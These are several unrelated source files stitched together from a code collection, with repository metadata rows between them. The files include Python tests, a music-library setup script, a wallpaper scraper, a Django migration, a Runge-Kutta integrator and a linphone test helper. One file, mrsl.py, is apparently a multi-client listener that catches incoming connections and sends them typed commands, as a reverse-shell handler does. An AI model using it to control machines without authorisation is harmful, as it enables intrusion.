"nombreplacesoccupeespmr": 0
}
}
]
}
"""
import json
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == parking_places
invalid_poi = {}
assert provider.get_informations(invalid_poi) is None
provider._call_webservice = MagicMock(return_value=None)
assert provider.get_informations(poi) is None
star_response = """
{
"records":[
{
"fields": {
}
}
]
}
"""
empty_parking = ParkingPlaces(available=None,
occupied=None,
available_PRM=None,
occupied_PRM=None)
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == empty_parking
star_response = """
{
"records":[
]
}
"""
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == empty_parking
# Information of PRM is not provided
parking_places = ParkingPlaces(available=4,
occupied=3)
provider = StarProvider('Keolis Rennes', 'toto', 42)
star_response = """
{
"records":[
{
"fields": {
"nombreplacesdisponibles": 4,
"nombreplacesoccupees": 3
}
}
]
}
"""
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
info = provider.get_informations(poi)
assert info == parking_places
assert not hasattr(info, "available_PRM")
assert not hasattr(info, "occupied_PRM")
| agpl-3.0 | 186,277,712,400,421,250 | 31.413534 | 83 | 0.60334 | false | 3.794894 | false | false | false |
ampyche/ampyche | setup/crap/createdb.py | 1 | 2330 | #!/usr/bin/env python
import os, time
import sqlite3 as lite
import populatedb as pdb
class AmpycheApp():
def __init__(self):
ANSN = ('N', 'n', 'No', 'no')
ANSY = ('Y', 'y', 'Yes', 'yes')
self.ANSN = ANSN
self.ANSY = ANSY
self.pdb = pdb
def _get_selection(self):
print("""
\nWelcome to Ampyche. Please select the appropriate action.
1. Setup Ampyche.
2. Rescan/Add new music.
3. Setup Ampyche using an already existing
Ampache mysql database.
""")
selection = input("---> ")
return selection
def _get_music_path(self):
print("""
\nPlease enter the path to where the music files reside.
For example: /home/music: """)
m_path = input("---> ")
m_path = str(m_path)
return m_path
def _select_one(self, a_path):
gettags = pdb.Ampyche()
gettags = gettags.run(a_path)
def _select_two(self):
print("selection two")
#update = self.upd.UpdateDb()
#update = update._update()
##############################################################
## Start of MySQL stuff
def _get_hostname(self):
print("""
Please enter the Hostname of the MySql Database. """)
response = input("---> ")
return response
def _get_username(self):
print("""
Please enter the MySql Database Username. """)
response = input("---> ")
return response
def _get_password(self):
print("""
Please enter the MySql Database Password. """)
response = input("---> ")
#need to validate for letters and numbers only
return response
def _get_dbname(self):
print("""
Please enter the MySql Database Name. """)
response = input("---> ")
#need to validate for letters and numbers only
return response
def _select_three(self, ):
print("selection three")
# hostname = self._get_hostname()
# username = self._get_username()
# password = self._get_password()
# dbname = self._get_dbname()
#make db connection and generate static files.
#do more stuff here
def main(self):
selection = self._get_selection()
music_path = self._get_music_path()
if selection == '1':
make_it_so = self._select_one(music_path)
print("selection 1 complete")
if selection == '2':
make_it_so2 = self._select_two()
print("selection 2 complete")
if selection == '3':
print("this is selection three")
if __name__ == "__main__":
app = AmpycheApp()
app = app.main() | mit | 4,055,968,117,639,858,700 | 22.545455 | 62 | 0.624034 | false | 3.119143 | false | false | false |
wangmengcn/BeautifulPics | wallpaper.py | 1 | 4351 | # -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import time
from sets import Set
import re
import os
import cookielib
# 构造 Request headers
agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36'
refer = 'http://interfacelift.com//wallpaper/7yz4ma1/04020_jetincarina_1440x900.jpg'
acceot = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
uir = '1'
host = 'interfacelift.com'
connection = 'keep-alive'
pragma = 'no-cache'
acencode = 'gzip, deflate, sdch'
acln = 'en,zh-CN;q=0.8,zh;q=0.6'
headers = {
'User-Agent': agent
#'Referer':refer
}
# 使用登录cookie信息
session = requests.session()
def get_tags():
url = "https://interfacelift.com/wallpaper/tags/"
baseurl = "https://interfacelift.com"
tags = session.get(url).text.encode('utf-8')
tagsoup = BeautifulSoup(tags, 'html5lib')
cloud = tagsoup.select('.cloud', _candidate_generator=None, limit=None)
for item in cloud:
try:
links = item.select('a')
print len(links)
floder = 0
for link in links:
try:
taglink = link['href']
taglink = baseurl + taglink
tagname = link.next_element.encode('utf-8')
filepath = os.getcwd() + '/wallpaper/' + str(floder)
print taglink
print filepath
print os.path.exists(filepath)
if not os.path.exists(filepath):
os.mkdir(filepath)
floder += 1
linkend = 1
picinit = taglink + "index" + str(linkend) + ".html"
while download(picinit, filepath):
linkend += 1
picinit = taglink + "index" + \
str(linkend) + ".html"
else:
floder += 1
continue
except:
floder += 1
print "下载出错"
except Exception, e:
print "出错了"
def download(picurl, path):
delchar = ['%2C', '%27']
if picurl:
unique = Set()
picpage = session.get(picurl).text
picsoup = BeautifulSoup(picpage.encode('utf-8'), 'html5lib')
divsoup = picsoup.select('a[href^="/wallpaper/details"]')
if divsoup:
try:
split = 0
for li in divsoup:
if split % 4 == 0:
baseurl = li['href'].split('/', -1)
id = int(baseurl[3])
subbase = baseurl[4].split('.', -1)
cleanbase = subbase[0].replace('_', '')
if '%2C' in cleanbase or '%27' in cleanbase:
cleanbase = cleanbase.replace('%2C', '')
cleanbase = cleanbase.replace('%27', '')
downloadurl = get_picurl(cleanbase, id, foo='1440x900')
print downloadurl, "--->", path
print cleanbase
get_file(downloadurl, cleanbase, path)
split += 1
return True
except:
print "获取链接失败"
return False
else:
return False
else:
return False
def get_picurl(base=None, id=None, foo='1440x900'):
baseurl = "http://interfacelift.com"
if base and id:
suburl = "/wallpaper/7yz4ma1/" + \
str(id) + '_' + base + '_' + foo + '.jpg'
picurl = baseurl + suburl
return picurl
def get_file(url, filename, path):
if url:
r = session.get(url, headers=headers)
# print r.text.encode('utf-8')
print filename
picname = path + "/" + filename + '.jpg'
with open(picname, 'wb') as f:
f.write(r.content)
print picname, "完成下载"
# f.close()
time.sleep(3)
# get_tags()
# get_file("http://interfacelift.com/wallpaper/7yz4ma1/01178_chicagoatnight_1440x900.jpg",'adas','.')
def test():
get_tags()
test()
| mit | 9,067,254,202,223,429,000 | 31.097015 | 130 | 0.492444 | false | 3.753054 | false | false | false |
buildingenergy/buildingenergy-platform | landing/migrations/0003_auto__add_field_seeduser_default_organization.py | 1 | 5820 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'SEEDUser.default_organization'
db.add_column(u'landing_seeduser', 'default_organization',
self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='default_users', null=True, to=orm['orgs.Organization']),
keep_default=False)
def backwards(self, orm):
# Deleting field 'SEEDUser.default_organization'
db.delete_column(u'landing_seeduser', 'default_organization_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'landing.seeduser': {
'Meta': {'object_name': 'SEEDUser'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_custom_columns': ('djorm_pgjson.fields.JSONField', [], {'default': '{}'}),
'default_organization': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'default_users'", 'null': 'True', 'to': u"orm['orgs.Organization']"}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'show_shared_buildings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75'})
},
u'orgs.organization': {
'Meta': {'ordering': "['name']", 'object_name': 'Organization'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'parent_org': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_orgs'", 'null': 'True', 'to': u"orm['orgs.Organization']"}),
'query_threshold': ('django.db.models.fields.IntegerField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'orgs'", 'symmetrical': 'False', 'through': u"orm['orgs.OrganizationUser']", 'to': u"orm['landing.SEEDUser']"})
},
u'orgs.organizationuser': {
'Meta': {'ordering': "['organization', '-role_level']", 'object_name': 'OrganizationUser'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['orgs.Organization']"}),
'role_level': ('django.db.models.fields.IntegerField', [], {'default': '20'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'pending'", 'max_length': '12'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['landing.SEEDUser']"})
}
}
complete_apps = ['landing'] | apache-2.0 | 187,370,825,201,765,600 | 71.7625 | 206 | 0.571134 | false | 3.709369 | false | false | false |
pauljohnleonard/pod-world | Segway/rungekutta.py | 1 | 2537 |
"""
DO NOT MODIFY
Time steps a system using runge-kutta 4th order numerical integration
Uses a time step of h
"""
import numpy
class RungeKutta:
def __init__(self, state,time, h,model):
"""
Initialise simulation
state -- starting state
time -- time
h -- runga kutta time step
model -- physical model
"""
self.n = len(state)
self.time=time;
self.h=h;
self.model=model;
self.state=state;
self.init()
def init(self):
self.state_dot1 = numpy.zeros(self.n)
self.state_dot2 = numpy.zeros(self.n)
self.state_dot3 = numpy.zeros(self.n)
self.state_dot4 = numpy.zeros(self.n)
self.state1 = numpy.zeros(self.n)
self.state2 = numpy.zeros(self.n)
self.state3 = numpy.zeros(self.n)
def stepRK(self):
"""
Perform one runga kutta time step
"""
# 1. initial state_dotocity at time
tstart = self.time
self.model._eval(tstart, self.state, self.state_dot1)
# 2. state_dotocity at time+h/2 using previous state_dot estimate
tmid = self.time + self.h/ 2.0
for i in xrange(self.n):
self.state1[i] = self.state[i] + self.h * self.state_dot1[i] * 0.5
self.model._eval(tmid, self.state1, self.state_dot2)
# 3. redo using new state_dotocity estimate
for i in xrange(self.n):
self.state2[i] = self.state[i] + self.h * self.state_dot2[i] * 0.5
self.model._eval(tmid, self.state1, self.state_dot3)
# 4. estimate state_dotocity at end
tend = self.time + self.h;
for i in xrange(self.n):
self.state3[i] = self.state[i] + self.h * self.state_dot3[i] * 0.5
self.model._eval(tend, self.state3, self.state_dot4)
for i in xrange(self.n):
self.state[i] += self.h * (self.state_dot1[i] + 2.0 * self.state_dot2[i] + 2.0 * self.state_dot3[i] + self.state_dot4[i])/ 6.0
self.time +=self.h
def reset(self):
"""
Reset the model
"""
self.time=0.0
self.model.reset()
self.init()
def step(self,dt):
"""
Perform runga-kutta time steps to advance the model by dt
"""
tend=self.time+dt
while(self.time < tend):
self.stepRK()
self.model.time=self.time
| gpl-2.0 | 7,965,845,920,631,956,000 | 26 | 138 | 0.528183 | false | 3.342556 | false | false | false |
infinity0n3/python-fabtotum | fabtotum/loaders/gerber/excellon_settings.py | 2 | 2928 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from argparse import PARSER
# Copyright 2015 Garret Fick <[email protected]>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Excellon Settings Definition File module
====================
**Excellon file classes**
This module provides Excellon file classes and parsing utilities
"""
import re
try:
from cStringIO import StringIO
except(ImportError):
from io import StringIO
from .cam import FileSettings
def loads(data):
""" Read settings file information and return an FileSettings
Parameters
----------
data : string
string containing Excellon settings file contents
Returns
-------
file settings: FileSettings
"""
return ExcellonSettingsParser().parse_raw(data)
def map_coordinates(value):
if value == 'ABSOLUTE':
return 'absolute'
return 'relative'
def map_units(value):
if value == 'ENGLISH':
return 'inch'
return 'metric'
def map_boolean(value):
return value == 'YES'
SETTINGS_KEYS = {
'INTEGER-PLACES': (int, 'format-int'),
'DECIMAL-PLACES': (int, 'format-dec'),
'COORDINATES': (map_coordinates, 'notation'),
'OUTPUT-UNITS': (map_units, 'units'),
}
class ExcellonSettingsParser(object):
"""Excellon Settings PARSER
Parameters
----------
None
"""
def __init__(self):
self.values = {}
self.settings = None
def parse_raw(self, data):
for line in StringIO(data):
self._parse(line.strip())
# Create the FileSettings object
self.settings = FileSettings(
notation=self.values['notation'],
units=self.values['units'],
format=(self.values['format-int'], self.values['format-dec'])
)
return self.settings
def _parse(self, line):
line_items = line.split()
if len(line_items) == 2:
item_type_info = SETTINGS_KEYS.get(line_items[0])
if item_type_info:
# Convert the value to the expected type
item_value = item_type_info[0](line_items[1])
self.values[item_type_info[1]] = item_value | gpl-3.0 | 3,470,824,948,019,611,600 | 26.895238 | 98 | 0.582309 | false | 4.350669 | false | false | false |
ShawnCorey/mrsl | mrsl.py | 1 | 5339 | import socket, threading, traceback
import curses
import curses.textpad
import datetime
from time import sleep
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-p','--port', default=80, type=int, help='Port number to listen on (default is 80)')
args = parser.parse_args()
PORT = args.port
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', PORT))
s.listen(4)
clients = [] #list of clients connected
lock = threading.Lock()
exitScript = False
class gui(threading.Thread):
def run(self):
curses.wrapper(self.draw_ui)
def draw_ui(self, stdscr):
global clients
global exitScript
height, width = stdscr.getmaxyx()
clientWin = stdscr.subwin(height-3, 17, 0, 0)
clientWin.scrollok(True)
bufferWin = stdscr.subwin(height-3, width-18,0, 18)
bufferWin.scrollok(True)
inputWin = stdscr.subwin(2, width-1,height-3, 0)
inputWin.scrollok(True)
tb = curses.textpad.Textbox(inputWin)
stdscr.nodelay(1)
k = 0
sendCommand = False
closeActive = False
oldHeight = 0
oldWidth = 0
while k != 276: #276 is keycode for F12
clientWin.clear()
if len(clients) == 0:
bufferWin.clear()
bufferWin.refresh()
height, width = stdscr.getmaxyx()
if oldHeight != height or oldWidth != width:
clientWin.resize(height-3, 17)
bufferWin.resize(height-3, width-18)
inputWin.resize(2, width-1)
if k == 9: # 9 is keycode for tab
for idx in range(0,len(clients)):
if clients[idx].active:
clients[idx].active = False
if idx >= len(clients)-1:
newIdx = 0
else:
newIdx = idx+1
clients[newIdx].active = True
clients[newIdx].updated = True
break
elif k == 10:# 10 is keycode for enter
sendCommand = True
elif k == 274:# 274 is keycode for F10
closeActive = True
elif k != 0:
tb.do_command(k)
lineNum = 0
for conn in clients:
if conn.active:
if sendCommand:
conn.command = tb.gather()
sendCommand = False
inputWin.clear()
if closeActive:
conn.toClose = True
closeActive = False
clientWin.addstr(lineNum,0,"*"+conn.r_ip+"\n")
#Update buffer display to show updated log buffer
if conn.updated:
bufferWin.clear()
bufferWin.addstr(0,0,conn.buffer)
bufferWin.refresh()
conn.updated = False
else:
clientWin.addstr(lineNum,0," "+conn.r_ip+"\n")
lineNum+=1
clientWin.refresh()
inputWin.refresh()
k = 0
try:
k = stdscr.getch()
except:
pass
#sleep(0.1)
exitScript = True
class remoteConn(threading.Thread):
active = False
toClose = False
updated = False
buffer = ""
command = ""
def __init__(self, sock):
threading.Thread.__init__(self)
socket, address = sock
self.socket = socket
self.r_ip, self.r_port = address
logname = self.r_ip+"--"+datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S-%f")+".log"
self.logfile = open(logname, "ab", 0)
def updateBuffer(self, data):
self.buffer += data.decode("utf-8")
self.logfile.write(data)
self.updated = True
def run(self):
global clients
global exitScript
global lock
lock.acquire()
clients.append(self)
if len(clients) == 1:
self.active = True
lock.release()
self.socket.settimeout(1)
while exitScript == False and self.toClose == False:
try:
data = self.socket.recv(1024)
if not data:
break
self.updateBuffer(data)
except Exception as e:
pass
if self.command != "":
self.socket.send(bytearray(self.command, "utf-8"))
self.updateBuffer(bytearray(self.command, "utf-8"))
self.command = ""
self.socket.close()
lock.acquire()
clients.remove(self)
if self.active and len(clients) >= 1:
clients[0].active = True
clients[0].updated = True
lock.release()
self.logfile.close()
threads = []
while exitScript == False: # wait for socket to connect
threads.append(gui().start())
s.settimeout(1)
while exitScript == False:
try:
threads.append(remoteConn(s.accept()).start())
except:
pass
for t in threads:
try:
t.join()
except:
pass
print("exiting")
| lgpl-3.0 | -6,856,561,642,211,354,000 | 30.591716 | 105 | 0.505338 | false | 4.237302 | false | false | false |
ChemiKhazi/Sprytile | rx/joins/joinobserver.py | 2 | 1443 | from rx.core import ObserverBase
from rx.disposables import SingleAssignmentDisposable
class JoinObserver(ObserverBase):
def __init__(self, source, on_error):
super(JoinObserver, self).__init__()
self.source = source
self.on_error = on_error
self.queue = []
self.active_plans = []
self.subscription = SingleAssignmentDisposable()
self.is_disposed = False
def _on_next_core(self, notification):
if not self.is_disposed:
if notification.kind == 'E':
self.on_error(notification.exception)
return
self.queue.append(notification)
active_plans = self.active_plans[:]
for plan in active_plans:
plan.match()
def _on_error_core(self, error):
return NotImplemented
def _on_completed_core(self):
return NotImplemented
def add_active_plan(self, active_plan):
self.active_plans.append(active_plan)
def subscribe(self):
self.subscription.disposable = self.source.materialize().subscribe(self)
def remove_active_plan(self, active_plan):
self.active_plans.remove(active_plan)
if not len(self.active_plans):
self.dispose()
def dispose(self):
super(JoinObserver, self).dispose()
if not self.is_disposed:
self.is_disposed = True
self.subscription.dispose()
| mit | 9,076,241,135,832,228,000 | 27.86 | 80 | 0.61192 | false | 4.030726 | false | false | false |
zhuolinho/linphone | submodules/linphone/tools/python/unittests/linphonetester.py | 8 | 32028 | from datetime import timedelta, datetime
from nose.tools import assert_equals
from copy import deepcopy
import linphone
import logging
import os
import sys
import time
import weakref
test_domain = "sipopen.example.org"
auth_domain = "sip.example.org"
test_username = "liblinphone_tester"
test_password = "secret"
test_route = "sip2.linphone.org"
if os.path.isdir(os.path.join(os.path.dirname(__file__), "rcfiles")):
# Running unit tests from an installed package
tester_resources_path = os.path.abspath(os.path.dirname(__file__))
else:
# Running unit tests from the linphone sources
tester_resources_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../../tester/"))
def linphonetester_log_handler(level, msg):
import logging
method = getattr(logging.getLogger("linphonetester"), level)
if not msg.strip().startswith('[PYLINPHONE]'):
msg = '[CORE] ' + msg
method(msg)
linphonetester_logger = logging.getLogger("linphonetester")
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s.%(msecs)03d %(levelname)s: %(message)s', '%H:%M:%S')
handler.setFormatter(formatter)
linphonetester_logger.addHandler(handler)
linphone.set_log_handler(linphonetester_log_handler)
def create_address(domain):
addr = linphone.Address.new(None)
assert addr != None
addr.username = test_username
assert_equals(addr.username, test_username)
if domain is None:
domain = test_route
addr.domain = domain
assert_equals(addr.domain, domain)
addr.display_name = None
addr.display_name = "Mr Tester"
assert_equals(addr.display_name, "Mr Tester")
return addr
class Account:
def __init__(self, id_addr, unique_id):
self.created = False
self.done = False
self.auth_requested = False
self.identity = id_addr.clone()
self.password = linphone.testing.get_random_token(8)
self.modified_identity = id_addr.clone()
modified_username = "{username}_{unique_id}".format(username=id_addr.username, unique_id=unique_id)
self.modified_identity.username = modified_username
class AccountManager:
def __init__(self):
self.unique_id = linphone.testing.get_random_token(6)
self.accounts = []
@classmethod
def wait_for_until(cls, lc1, lc2, func, timeout):
lcs = []
if lc1 is not None:
lcs.append(lc1)
if lc2 is not None:
lcs.append(lc2)
return cls.wait_for_list(lcs, func, timeout)
@classmethod
def wait_for_list(cls, lcs, func, timeout):
start = datetime.now()
end = start + timedelta(milliseconds = timeout)
res = func(*lcs)
while not res and datetime.now() < end:
for lc in lcs:
lc.iterate()
time.sleep(0.02)
res = func(*lcs)
return res
@classmethod
def account_created_on_server_cb(cls, lc, cfg, state, message):
if state == linphone.RegistrationState.Ok:
lc.user_data().created = True
elif state == linphone.RegistrationState.Cleared:
lc.user_data().done = True
@classmethod
def account_created_auth_requested_cb(cls, lc, realm, username, domain):
lc.user_data().auth_requested = True
def check_account(self, cfg):
create_account = False
lc = cfg.core
id_addr = cfg.identity_address
account = self._get_account(id_addr)
if account is None:
linphonetester_logger.info("[TESTER] No account for {identity} exists, going to create one.".format(identity=id_addr.as_string()))
account = Account(id_addr, self.unique_id)
self.accounts.append(account)
create_account = True
cfg.identity_address = account.modified_identity
if create_account:
self._create_account_on_server(account, cfg)
ai = linphone.AuthInfo.new(account.modified_identity.username, None, account.password, None, None, account.modified_identity.domain)
lc.add_auth_info(ai)
return account.modified_identity
def _get_account(self, id_addr):
for account in self.accounts:
if account.identity.weak_equal(id_addr):
return account
return None
def _create_account_on_server(self, account, refcfg):
vtable = {}
tmp_identity = account.modified_identity.clone()
vtable['registration_state_changed'] = AccountManager.account_created_on_server_cb
vtable['auth_info_requested'] = AccountManager.account_created_auth_requested_cb
lc = CoreManager.configure_lc_from(vtable, tester_resources_path, None, account)
lc.sip_transports = linphone.SipTransports(-1, -1, -1, -1)
cfg = lc.create_proxy_config()
tmp_identity.password = account.password
tmp_identity.set_header("X-Create-Account", "yes")
cfg.identity_address = tmp_identity
server_addr = linphone.Address.new(refcfg.server_addr)
server_addr.transport = linphone.TransportType.Tcp;
server_addr.port = 0
cfg.server_addr = server_addr.as_string()
cfg.expires = 3600
lc.add_proxy_config(cfg)
if AccountManager.wait_for_until(lc, None, lambda lc: lc.user_data().auth_requested == True, 10000) != True:
linphonetester_logger.critical("[TESTER] Account for {identity} could not be created on server.".format(identity=refcfg.identity_address.as_string()))
sys.exit(-1)
cfg.edit()
cfg.identity_address = account.modified_identity
cfg.done()
ai = linphone.AuthInfo.new(account.modified_identity.username, None, account.password, None, None, account.modified_identity.domain)
lc.add_auth_info(ai)
if AccountManager.wait_for_until(lc, None, lambda lc: lc.user_data().created == True, 3000) != True:
linphonetester_logger.critical("[TESTER] Account for {identity} is not working on server.".format(identity=refcfg.identity_address.as_string()))
sys.exit(-1)
lc.remove_proxy_config(cfg)
if AccountManager.wait_for_until(lc, None, lambda lc: lc.user_data().done == True, 3000) != True:
linphonetester_logger.critical("[TESTER] Account creation could not clean the registration context.")
sys.exit(-1)
account_manager = AccountManager()
class CoreManagerStats:
def __init__(self):
self.reset()
def reset(self):
self.number_of_LinphoneRegistrationNone = 0
self.number_of_LinphoneRegistrationProgress = 0
self.number_of_LinphoneRegistrationOk = 0
self.number_of_LinphoneRegistrationCleared = 0
self.number_of_LinphoneRegistrationFailed = 0
self.number_of_auth_info_requested = 0
self.number_of_LinphoneCallIncomingReceived = 0
self.number_of_LinphoneCallOutgoingInit = 0
self.number_of_LinphoneCallOutgoingProgress = 0
self.number_of_LinphoneCallOutgoingRinging = 0
self.number_of_LinphoneCallOutgoingEarlyMedia = 0
self.number_of_LinphoneCallConnected = 0
self.number_of_LinphoneCallStreamsRunning = 0
self.number_of_LinphoneCallPausing = 0
self.number_of_LinphoneCallPaused = 0
self.number_of_LinphoneCallResuming = 0
self.number_of_LinphoneCallRefered = 0
self.number_of_LinphoneCallError = 0
self.number_of_LinphoneCallEnd = 0
self.number_of_LinphoneCallPausedByRemote = 0
self.number_of_LinphoneCallUpdatedByRemote = 0
self.number_of_LinphoneCallIncomingEarlyMedia = 0
self.number_of_LinphoneCallUpdating = 0
self.number_of_LinphoneCallReleased = 0
self.number_of_LinphoneTransferCallOutgoingInit = 0
self.number_of_LinphoneTransferCallOutgoingProgress = 0
self.number_of_LinphoneTransferCallOutgoingRinging = 0
self.number_of_LinphoneTransferCallOutgoingEarlyMedia = 0
self.number_of_LinphoneTransferCallConnected = 0
self.number_of_LinphoneTransferCallStreamsRunning = 0
self.number_of_LinphoneTransferCallError = 0
self.number_of_LinphoneMessageReceived = 0
self.number_of_LinphoneMessageReceivedWithFile = 0
self.number_of_LinphoneMessageReceivedLegacy = 0
self.number_of_LinphoneMessageExtBodyReceived = 0
self.number_of_LinphoneMessageInProgress = 0
self.number_of_LinphoneMessageDelivered = 0
self.number_of_LinphoneMessageNotDelivered = 0
self.number_of_LinphoneIsComposingActiveReceived = 0
self.number_of_LinphoneIsComposingIdleReceived = 0
self.number_of_LinphoneFileTransferDownloadSuccessful = 0
self.progress_of_LinphoneFileTransfer = 0
self.number_of_IframeDecoded = 0
self.number_of_NewSubscriptionRequest =0
self.number_of_NotifyReceived = 0
self.number_of_LinphonePresenceActivityOffline = 0
self.number_of_LinphonePresenceActivityOnline = 0
self.number_of_LinphonePresenceActivityAppointment = 0
self.number_of_LinphonePresenceActivityAway = 0
self.number_of_LinphonePresenceActivityBreakfast = 0
self.number_of_LinphonePresenceActivityBusy = 0
self.number_of_LinphonePresenceActivityDinner = 0
self.number_of_LinphonePresenceActivityHoliday = 0
self.number_of_LinphonePresenceActivityInTransit = 0
self.number_of_LinphonePresenceActivityLookingForWork = 0
self.number_of_LinphonePresenceActivityLunch = 0
self.number_of_LinphonePresenceActivityMeal = 0
self.number_of_LinphonePresenceActivityMeeting = 0
self.number_of_LinphonePresenceActivityOnThePhone = 0
self.number_of_LinphonePresenceActivityOther = 0
self.number_of_LinphonePresenceActivityPerformance = 0
self.number_of_LinphonePresenceActivityPermanentAbsence = 0
self.number_of_LinphonePresenceActivityPlaying = 0
self.number_of_LinphonePresenceActivityPresentation = 0
self.number_of_LinphonePresenceActivityShopping = 0
self.number_of_LinphonePresenceActivitySleeping = 0
self.number_of_LinphonePresenceActivitySpectator = 0
self.number_of_LinphonePresenceActivitySteering = 0
self.number_of_LinphonePresenceActivityTravel = 0
self.number_of_LinphonePresenceActivityTV = 0
self.number_of_LinphonePresenceActivityUnknown = 0
self.number_of_LinphonePresenceActivityVacation = 0
self.number_of_LinphonePresenceActivityWorking = 0
self.number_of_LinphonePresenceActivityWorship = 0
self.last_received_presence = None
self.number_of_inforeceived = 0
self.number_of_LinphoneSubscriptionIncomingReceived = 0
self.number_of_LinphoneSubscriptionOutgoingInit = 0
self.number_of_LinphoneSubscriptionPending = 0
self.number_of_LinphoneSubscriptionActive = 0
self.number_of_LinphoneSubscriptionTerminated = 0
self.number_of_LinphoneSubscriptionError = 0
self.number_of_LinphoneSubscriptionExpiring = 0
self.number_of_LinphonePublishProgress = 0
self.number_of_LinphonePublishOk = 0
self.number_of_LinphonePublishExpiring = 0
self.number_of_LinphonePublishError = 0
self.number_of_LinphonePublishCleared = 0
self.number_of_LinphoneConfiguringSkipped = 0
self.number_of_LinphoneConfiguringFailed = 0
self.number_of_LinphoneConfiguringSuccessful = 0
self.number_of_LinphoneCallEncryptedOn = 0
self.number_of_LinphoneCallEncryptedOff = 0
self.last_received_chat_message = None
class CoreManager:
@classmethod
def configure_lc_from(cls, vtable, resources_path, rc_path, user_data=None):
filepath = None
if rc_path is not None:
filepath = os.path.join(resources_path, rc_path)
assert_equals(os.path.isfile(filepath), True)
lc = linphone.Core.new(vtable, None, filepath)
linphone.testing.set_dns_user_hosts_file(lc, os.path.join(resources_path, 'tester_hosts'))
lc.root_ca = os.path.join(resources_path, 'certificates', 'cn', 'cafile.pem')
lc.ring = os.path.join(resources_path, 'sounds', 'oldphone.wav')
lc.ringback = os.path.join(resources_path, 'sounds', 'ringback.wav')
lc.static_picture = os.path.join(resources_path, 'images', 'nowebcamCIF.jpg')
lc.user_data = weakref.ref(user_data)
return lc
@classmethod
def wait_for_until(cls, manager1, manager2, func, timeout):
managers = []
if manager1 is not None:
managers.append(manager1)
if manager2 is not None:
managers.append(manager2)
return cls.wait_for_list(managers, func, timeout)
@classmethod
